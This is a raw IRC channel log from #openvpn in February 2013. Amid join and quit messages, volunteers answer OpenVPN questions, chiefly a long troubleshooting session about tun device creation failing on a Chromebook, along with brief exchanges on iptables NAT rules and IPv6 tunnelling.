20:51 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
20:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
20:52 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
20:52 -!- mode/#openvpn [+o krzee] by ChanServ
21:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving]
21:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
22:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
22:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
22:48 -!- James_Epp [~derp@216.36.170.104] has quit [Quit: ThrashIRC v2.8 sic populo comunicated]
22:49 -!- batrick [~batrick@nmap/developer/batrick] has quit [Quit: WeeChat 0.3.9.2]
22:49 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn
23:00 -!- Devastator- [~devas@186.214.110.60] has joined #openvpn
23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds]
23:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
--- Day changed Sat Feb 16 2013
01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.18.35] has quit [Ping timeout: 244 seconds]
01:21 -!- b1rkh0ff [~b1rkh0ff@178.77.20.251] has joined #openvpn
01:36 -!- Orbi [~opera@109.129.24.113] has joined #openvpn
01:36 -!- Orbi [~opera@109.129.24.113] has left #openvpn []
01:45 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
01:47 -!- xbanux [~xbanux@triband-mum-59.182.166.224.mtnl.net.in] has joined #openvpn
02:05 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn
02:06 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds]
02:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection]
02:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
02:33 -!- mode/#openvpn [+o vpnHelper] by ChanServ
02:36 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Network is unreachable]
02:36 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
02:36 -!- mode/#openvpn [+o vpnHelper] by ChanServ
02:40 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Read error: Operation timed out]
02:41 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn
02:52 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
03:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
04:12 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection]
04:18 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
04:20 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
04:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds]
04:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat]
04:31 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
04:49 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
04:51 -!- mnathani [~mnathani@198.84.231.11] has quit []
04:52 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
04:55 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 264 seconds]
04:56 -!- xbanux [~xbanux@triband-mum-59.182.166.224.mtnl.net.in] has quit [Read error: Connection reset by peer]
04:56 -!- xbanux [~xbanux@triband-mum-59.182.146.167.mtnl.net.in] has joined #openvpn
05:00 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
05:09 -!- xbanux [~xbanux@triband-mum-59.182.146.167.mtnl.net.in] has quit [Read error: Connection reset by peer]
05:10 -!- xbanux [~xbanux@triband-mum-59.182.179.193.mtnl.net.in] has joined #openvpn
05:13 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: Connection reset by peer]
05:22 -!- AsadH is now known as zz_AsadH
05:40 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn
05:44 -!- xbanux [~xbanux@triband-mum-59.182.179.193.mtnl.net.in] has quit [Read error: Connection reset by peer]
05:45 -!- xbanux [~xbanux@triband-mum-59.182.135.141.mtnl.net.in] has joined #openvpn
05:50 -!- xbanux [~xbanux@triband-mum-59.182.135.141.mtnl.net.in] has quit [Read error: Connection reset by peer]
05:50 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has joined #openvpn
05:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:11 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Operation timed out]
06:11 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn
06:14 -!- Devastator- [~devas@186.214.110.60] has quit [Changing host]
06:14 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
06:15 -!- Devastator- is now known as Devastator
06:25 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection]
06:25 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn
06:30 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Ping timeout: 244 seconds]
06:36 -!- erry is now known as zombierry
06:43 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
06:43 -!- mode/#openvpn [+v s7r] by ChanServ
06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds]
06:46 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 252 seconds]
06:46 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn
06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:58 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
07:03 -!- master_of_master [~master_of@p57B54A92.dip.t-dialin.net] has quit [Ping timeout: 245 seconds]
07:05 -!- master_of_master [~master_of@p57B542F9.dip.t-dialin.net] has joined #openvpn
07:07 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
07:08 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 256 seconds]
07:21 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn
07:22 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds]
07:36 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn
07:40 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
07:40 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Ping timeout: 255 seconds]
07:42 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 244 seconds]
07:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:54 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
07:57 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 252 seconds]
08:05 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
08:07 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
08:08 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds]
08:14 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
08:17 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds]
08:20 -!- p3rror [~mezgani@2001:0:53aa:64c:105b:1370:d606:8bc8] has joined #openvpn
08:22 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
08:27 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
08:29 -!- gedO_ [~quassel@client-178-16-35-81.inturbo.lt] has quit [Ping timeout: 248 seconds]
08:38 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
08:39 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit]
08:41 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds]
08:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
08:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
09:14 -!- zombierry is now known as erry
09:16 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds]
09:23 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: No route to host]
09:24 -!- HyperGlide [~HyperGlid@110.185.147.126] has joined #openvpn
09:24 -!- HyperGlide [~HyperGlid@110.185.147.126] has quit [Remote host closed the connection]
09:36 < bandroidx> how much extra processing on the server and the client does tls-auth take when its enabled?
09:39 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 256 seconds]
09:40 -!- Orbi [~opera@109.129.24.113] has joined #openvpn
09:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
09:55 -!- p3rror [~mezgani@2001:0:53aa:64c:105b:1370:d606:8bc8] has quit [Ping timeout: 245 seconds]
10:06 -!- p3rror [~mezgani@2001:0:53aa:64c:2843:1370:d606:7355] has joined #openvpn
10:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
10:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:52 -!- Orbi [~opera@109.129.24.113] has left #openvpn []
10:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
10:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
11:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:03 -!- Orbi [~opera@109.129.24.113] has joined #openvpn
11:07 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
11:08 -!- Sickness\ is now known as sickness\
11:15 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has quit [Ping timeout: 245 seconds]
11:25 -!- sickness\ is now known as Sickness\
11:29 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has joined #openvpn
11:33 -!- Sickness\ is now known as sickness\
11:34 -!- Orbi [~opera@109.129.24.113] has quit [Quit: Orbi]
11:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
11:41 -!- sickness\ is now known as Sickness\
11:58 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has quit [Ping timeout: 252 seconds]
11:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
12:01 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn
12:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
12:45 -!- else- [~else@towely.iodev.org] has joined #openvpn
12:45 < else-> hello, i'm trying to start an openvpn tunnel from a cronjob, but all i get is "Starting virtual private network daemon: foobar failed"
12:45 < else-> i can start it manually using the same user though
12:45 < else-> any idea on how to increase verbosity?
13:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
13:22 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Read error: Connection reset by peer]
13:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 276 seconds]
13:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
13:58 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 245 seconds]
14:07 -!- p3rror [~mezgani@2001:0:53aa:64c:2843:1370:d606:7355] has quit [Ping timeout: 245 seconds]
14:10 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn
14:17 -!- xbanux [~xbanux@triband-mum-59.182.149.239.mtnl.net.in] has quit [Ping timeout: 276 seconds]
14:20 -!- p3rror [~mezgani@2001:0:53aa:64c:3434:1370:d673:ec6e] has joined #openvpn
14:26 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn
14:35 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 256 seconds]
14:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/]
14:56 -!- k1ng [~k1ng@76.73.57.172] has joined #openvpn
14:56 -!- k1ng [~k1ng@76.73.57.172] has quit [Changing host]
14:56 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn
15:04 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:11 -!- p3rror [~mezgani@2001:0:53aa:64c:3434:1370:d673:ec6e] has quit [Ping timeout: 245 seconds]
15:20 -!- b1rkh0ff [~b1rkh0ff@178.77.20.251] has quit [Quit: Leaving]
15:21 < Kireji> so I got openVPN set up to do redirect the way I want, and I used the iptables commands from the bot to do it. Unfortunately, I don't really understand what the commands have done, or what the implications are for security.
15:22 < Kireji> Can someone help me understand what the rules these two commands have inserted into iptables do: (1) "sudo iptables -I FORWARD -i tun+ -j ACCEPT" and (2) "sudo iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE"
15:24 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit []
15:25 -!- p3rror [~mezgani@2001:0:53aa:64c:24c1:1370:d606:a004] has joined #openvpn
15:38 -!- p3rror [~mezgani@2001:0:53aa:64c:24c1:1370:d606:a004] has quit [Ping timeout: 245 seconds]
15:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
15:51 -!- p3rror [~mezgani@2001:0:53aa:64c:5e:1370:d670:1b9f] has joined #openvpn
16:10 -!- p3rror [~mezgani@2001:0:53aa:64c:5e:1370:d670:1b9f] has quit [Ping timeout: 245 seconds]
16:17 -!- p3rror [~mezgani@2001:0:53aa:64c:10bd:37b4:d670:1b9f] has joined #openvpn
16:39 < kisom> Kireji: I suggest you read the iptables manual.
16:56 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
17:01 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
17:02 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
17:22 -!- p3rror [~mezgani@2001:0:53aa:64c:10bd:37b4:d670:1b9f] has quit [Ping timeout: 245 seconds]
17:35 -!- p3rror [~mezgani@2001:0:53aa:64c:c97:37b4:d607:599a] has joined #openvpn
17:38 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:39 < Kireji> true. thanks
18:34 -!- p3rror [~mezgani@2001:0:53aa:64c:c97:37b4:d607:599a] has quit [Ping timeout: 245 seconds]
18:58 -!- tr3nx [~me@c-98-225-113-64.hsd1.az.comcast.net] has joined #openvpn
18:58 -!- tr3nx [~me@c-98-225-113-64.hsd1.az.comcast.net] has quit [Client Quit]
19:27 <+s7r> if I have a dual stack ipv4 & ipv6 openvpn server and only ipv4 client can the client reach the ipv6 internet via the vpn tunnel?
19:27 <+s7r> in some way ?
19:52 -!- max_ [~max@98.225.19.83] has joined #openvpn
19:57 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds]
19:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
20:00 < pekster> s7r: Yes, although the client OS must support IPv6 software-wise. See the --tun-ipv6 option in the manpage, and the section titled 'IPv6 Related Options'
20:01 <+s7r> thanks
20:01 <+s7r> so technically it is possible
20:01 <+s7r> either ipv6 = ipv6 tunnel, ipv4 - ipv4 or ipv4 - ipv4/ipv6
20:01 < pekster> You have to give the client an IPv4 address either way
20:02 < pekster> You can, however, just use a bogus rfc1918 subnet you never plan on actually using
20:02 <+s7r> i need a RFC1918 subnet even if i could tunnel ipv6-ipv6 ?
20:03 < pekster> Just for the VPN network
20:03 < pekster> It's a completely virtual network that you can happily ignore if you don't plan on using it
20:05 <+s7r> yeah i know but it's a requirement or optional? i'm thinking if i would have native ipv6 on the client side also, why would i need RFC1918 for ipv4 tunneling
20:09 < pekster> Well, it doesn't *need* to be rfc1918, but it's stupid to use a public block of IPs if you don't even plan on using the v4 addresses anyway
20:09 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 272 seconds]
20:09 <+s7r> but it won't work with ipv4 disabled, just ipv6 enabled ?
20:10 < pekster> No
20:10 < pekster> You cannot run openvpn in a mode where it does not allocate a virtual IPv4 IP to the server and clients
20:10 < pekster> I don't see why this is a problem
20:11 <+s7r> it's not
20:11 <+s7r> i was just asking
20:11 <+s7r> i thought it works
20:12 < pekster> Eventually the IPv4 requirement will probably be lifted, but AFAIK there's no rush to do that since most of the world is still accessed over the IPv4-Internet
20:12 <+s7r> yes
20:12 <+s7r> that's right
20:12 <+s7r> many thanks for your help pekster
20:13 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
20:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
20:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
20:32 -!- Kovica [~Kovica@77.38.49.83] has joined #openvpn
20:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
21:22 -!- Kovica [~Kovica@77.38.49.83] has quit [Remote host closed the connection]
21:23 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn
21:25 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 255 seconds]
21:29 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn
21:29 < roue> hola
21:29 < roue> I'm trying to run openvpn under Chromeos.
21:29 < roue> On a chromebook, that is.
21:29 < roue> Their build is seg faulting.
21:30 < roue> I installed a debian wheezy chroot and tried to launch via that. No longer segfaults but it still fails to properly initiate the connection.
21:30 < roue> I've got several other systems using my openvpn install without issue. The clients are a combination of linux (debian) and MacOSX.
21:31 < roue> I figured this would be easy. Just set up the keys, copy over the files and config and go.
21:31 < pekster> What is "their build" ? Something downstream patched from the official release?
21:31 < roue> It's turning into a PITA.
21:32 < roue> the ChromeOS version is 2.1.12 [SSL] [LZ02] [EPOLL] [PKCS11]
21:32 < pekster> That's very, very old
21:33 < roue> the debian chroot version I've tried is 2.2.1 [SSL] [LZ02] [EPOLL] [PKCS11] [eurephia] [MH] [PF_INET6] [IPv6 payload 20110424-2 (2.2RC2)]
21:33 < pekster> We're up to 2.3.0 now. If you're performing builds, especially ones where you want IPv6 connectivity, the 2.3 series is probably what you want
21:34 < roue> the server is OpenVPN 2.1_rc11 i486-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11]
21:34 < pekster> Ultimately to fix the segfault you should build with debugging enabled (ie: CFLAGS="-ggdb -fno-omit-frame-pointer") and not strip debug symbols, and get a stack trace
21:35 < pekster> But, the issue may well have been fixed in the last 2 major point-releases OpenVPN has done, so IMO you're better off working to build a more recent copy of upstream
21:35 < roue> It seg faults with the Chromeos build. With the debian build it just sits and spins forever.
21:35 < roue> I'm not sure whether it's a problem with openvpn or something wrong with the tun/tap device.
21:36 < pekster> Verbose logs would help if you have a build that is not crashing but not doing what you expect
21:36 < roue> pekster if you've got time to take a peek I'll generate them.
21:36 < pekster> Things like segfaults can of course be considered bugs, but "it segfaults" is a bad way to give you any answer other than "some bit of code is broken"
21:36 < roue> sure.
21:37 < pekster> 'verb 4' is a good place to start, and you may need 'verb 5' if the issue is related to firewalls or one direction of traffic flow being dropped
21:37 < roue> I'll give you logs from the non-segfaulting debian install.
21:37 < roue> do you have a preferred pastebin?
21:38 < pekster> I'm somewhat partial to gist.github.com, but really "anything" is fine.
I just dislike pastebin.com's ads, so you'll make me happy using something with non-annoying ads ;)
21:38 < pekster> So no, I don't "really" care
21:45 < roue> https://gist.github.com/anonymous/d6d8e428101af016a09e
21:45 <@vpnHelper> Title: openvpn on chromeos (at gist.github.com)
21:45 < roue> that's the log
21:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
21:50 < pekster> A couple lines got mangled there, but line 335 in the actual paste shows that tun0 was opened, but on line 339 you get errors claiming the device doesn't exist reported from ifconfig
21:51 < roue> yeah, i noticed that too. I think chromeos may have a non-functional tun device.
21:52 < roue> I can manually tunctl add a device, but don't really know how to test it.
21:52 < roue> or if there's some way to work around it.
21:53 < pekster> Well, you could see --ifconfig-noexec in the manpage if you want to use custom scripts instead of having openvpn configure the device
21:53 < pekster> That's really just a work-around of the issue, but may work for you. Obviously something is causing ifconfig to fail like that, either the tun0 device not getting created despite successful return when openvpn asks the system to do so, or some issue accessing the device by ifconfig
21:55 < roue> Hmm.. okay, I'll give that a shot. --ifconfig-noexec and --route-noexec .
21:55 < roue> manually configure the device and the route.
21:56 < pekster> See the referenced scripts in those commands, and the section 'SCRIPTING AND ENVIRONMENTAL VARIABLES' will be useful so you know what env-vars you get that your script is expected to deal with for routes passed, etc
21:59 < pekster> I also prefer using iproute2 for configurations (which is not the default build, although some distros may make it their default or provide it as an option) via the --enable-iproute2 command.
I'm not sure if your issue is ifconfig, or the actual creation of the dynamic tun device
22:00 < pekster> That's a ./configure option, for clarification
22:01 < roue> pre-creating the tun0 device and starting with ifconfig-noexec and route-noexec seems to have established the connection.
22:02 < roue> don't understand enough about how to manually configure the tun0 device and routes to make it useful but I'll keep working on that.
22:02 < pekster> If you want to go that route, yea. As a client, it needs to configure the address the server is pushing, plus any routes, etc
22:03 < pekster> It's a little odd that it's broken like that, although that is also a release that is years old now
22:03 < pekster> Could be an OS thing too, as you suggested
22:06 < pekster> 1 sec, I'll pastebin you a minimal p2p config you can run locally to test and see if the tun0 setup works in a "most basic" config
22:08 < roue> thanks.
22:10 < pekster> https://gist.github.com/anonymous/4970097
22:10 <@vpnHelper> Title: gist:4970097 (at gist.github.com)
22:11 < roue> that's from the chromebook to itself?
22:12 < pekster> Right. It'll act as both the "client" and "server" (technically p2p has no notion of client/server, but the "server" is the one waiting for an inbound connection in this case)
22:12 < pekster> Even doing the top setup only will still cause the tun device to get created
22:13 < pekster> I just included the 2nd part in case you wanted to actually connect to it and try a connectivity test such as pinging the peer from the other instance (firewall needs to allow the traffic too, of course)
22:17 < roue> with --dev tun it's not creating the tun0 device and failing. If I run openvpn --mktun --dev tun0 and tun1 I can specify --dev tun0 (on the first instance) and --dev tun1 (on the second) and it gets to "Initialization Sequence Completed" on both sides.
22:17 < roue> and I can ping both 10.50.0.1 and 0.2
22:18 < pekster> fyi, the ping normally is sourced from its own IP, so you need to bind the ping to the other peer
22:18 < pekster> but, that's really not part of your issue here
22:18 < pekster> So, something is not working in the handoff between openvpn and the OS to dynamically create the tun device
22:18 < pekster> Maybe that's fixed in a newer version. I'm not really sure it's productive to debug the 2.1.12 release...
22:19 < roue> understood. I can probably build the latest release in my chroot.
22:19 < roue> Is it backward compatible with my 2.1 server ?
22:19 < pekster> Yup
22:19 < pekster> 2.x is backwards compatible down to 2.0.x, but not 1.x
22:20 < roue> any glaring security issues with the older versions?
22:23 < pekster> Doesn't look like it, but http://openvpn.net/index.php/open-source/documentation/change-log.html is the full changelog
22:23 <@vpnHelper> Title: Changelogs (at openvpn.net)
22:23 < pekster> Besides issues with openssl and such, but on Unix/Linux that's normally handled by dynamic linking; Windows builds provide their own openssl libs, and that is potentially a problem for old versions
22:25 < pekster> I also have no clue what "2.1.12" is since upstream never released that
22:25 < pekster> 2.1.4 is the latest in the 2.1.x series
22:25 < pekster> Oh, 2.1_rc11 is in your output, I see
22:26 < roue> I think I got it.
22:26 < roue> manually did the mktun
22:26 < roue> ran openvpn with --ifconfig-noexec and --route-noexec
22:26 < pekster> You are using a version that's nearly 5 years old
22:26 < roue> once the connection was established I ifconfig'd tun0
22:26 < roue> and then manually entered in the route adds.
22:27 < pekster> If it's just the tun-creation issue, you can mktun or use your OS to do that, then maybe ifconfig will work?
22:27 < pekster> Dunno, I'll leave it to you to work through fixing that.
And go slap your distro provider for not using a version more recent than 54 months
22:27 < roue> I tried that first, but it dies on the route adding.
22:27 < roue> well... it's debian :)
22:28 < pekster> http://packages.qa.debian.org/o/openvpn.html
22:28 <@vpnHelper> Title: Debian Package Tracking System - openvpn (at packages.qa.debian.org)
22:28 < pekster> 2.1_rc11 is "oldstable"
22:28 < roue> Yeah, my server is Lenny.
22:29 < roue> it's just an old firewall box.
22:29 < roue> I mean, really old.
22:29 < roue> AMD K6 200.
22:29 < roue> I think I bought it in 1997.
22:29 < pekster> I dealt with a similar issue of CentOS having really outdated packages for subversion; I just maintained my own installation through a traditional ./configure --prefix=/usr/local/svn $other_opts && make && make install
22:30 < roue> Yeah, I used to do the same, but this was an if-it-ain't-broke situation.
22:30 < pekster> Well, it is broken ;)
22:30 < roue> That server had been up for about a year and a half the last time I had to do anything with it.
22:30 < pekster> But, you have a few options to fix, so you get the choice of how to handle it
22:30 < roue> Actually, I'm pretty sure this isn't an openvpn version issue.
22:31 < pekster> Right, could be completely on the OS side
22:31 < roue> I'm pretty convinced it's that ChromeOS wasn't built for people to go futzing with the root shell.
22:31 < pekster> If the openvpn version is *that* old, my guess is so is the tun driver in the kernel ;)
22:31 < roue> not without being willing to put up with stuff like this.
22:31 < pekster> And related net tools, etc
22:31 < roue> Actually the kernel is 3.4.0
22:32 < pekster> Weird. 4+ year old userspace, and 3.4 kernel....
22:32 < roue> well... okay, maybe not so new. What's it up to now 3.7?
22:33 < pekster> My source distro on my LAN (gentoo) is 3.5.7 for stable kernel, so 3.4 isn't "that" old by comparison
22:37 < roue> I've been meaning to move the firewall off the old box and go with something newer.
22:37 < roue> Even have the hardware lined up, just haven't spent the time on it.
22:37 < roue> I bought one of those pogoplugs. have you seen them?
22:38 < roue> low power draw. run debian. gig ethernet and 4 usb ports.
22:38 < roue> I bought a handful of usb eth adapters.
22:38 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
22:39 < pekster> I'm not a fan of USB ethernet as they don't tend to be the most stable things
22:39 < pekster> Plus the 480Mbps limit of USB 2.x is annoying if you have GigE
22:39 < roue> this is so cool. I've got the vpn going to my internal network and X11 forwarding's letting me run firefox and fvwm2 on a chromebook... :)
22:39 < roue> it's some kind of sin.
22:39 < pekster> 12Mbps for USB 1.x, so you gotta be careful there too :P
22:40 < roue> well, my lan is split up a bit and the cable internet isn't too fast in and of itself.
22:40 < pekster> For troubleshooting/temp uses only, I do have two pegasus-chipset USB ethernet, but despite being "10/100 Base-T" supported, it runs at strictly USB 1.1, so it can't go faster than 12Mbps. Oh, plus USB slaughters the CPU as throughput goes up
22:40 < pekster> But, they technically "work"
22:40 < roue> the firewall has a nic for the WAN, one for the internal lan (going to a gig switch) and one for the wireless ap.
22:41 < roue> the wireless is open, but you can't get to the internal lan except through openvpn.
22:41 < roue> so the chromebook had been locked away from my internal file/video/music server until I got this working :)
22:41 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection]
23:07 < roue> thanks much for your help by the way.
23:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
23:15 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer]
23:15 -!- raidzz [~raidz@raidz.im] has joined #openvpn
23:15 -!- raidzz is now known as raidz
23:15 -!- raidz [~raidz@raidz.im] has quit [Changing host]
23:15 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
23:15 -!- mode/#openvpn [+o raidz] by ChanServ
23:15 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 246 seconds]
23:17 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood]
23:17 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn
23:39 < roue> still there pekster?
23:40 < roue> just for fun I downloaded and built the latest openvpn source in my debian chroot. Same thing happens.
23:41 < pekster> Interesting. I'm not familiar with the debug loglevels above 5 (6+ generate a lot of low-level debug messages) but it's possible one of them is interesting. But, that might all be hidden from openvpn anyway if it's an OS failing
23:42 < roue> it fails when trying to ifconfig tun0. Says SIOCSIFADDR: No such device
23:44 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
23:45 < roue> though actually if I manually mktun and run specifying --dev tun0 it will ifconfig and set the route, so that's progress.
23:48 < pekster> The old version didn't do that, right?
23:53 < tjz> hello guys
23:59 < roue> right
--- Day changed Sun Feb 17 2013
00:01 < pekster> So, progress. You can create the device outside of openvpn and then you may not need ifconfig-noexec
00:01 < pekster> It's still really strange that you can 'openvpn --mktun --dev tun0' but it can't do that during startup.
AFAIK it uses the same backend to do that, but I haven't dug into the code in that area enough to know offhand if it's identical
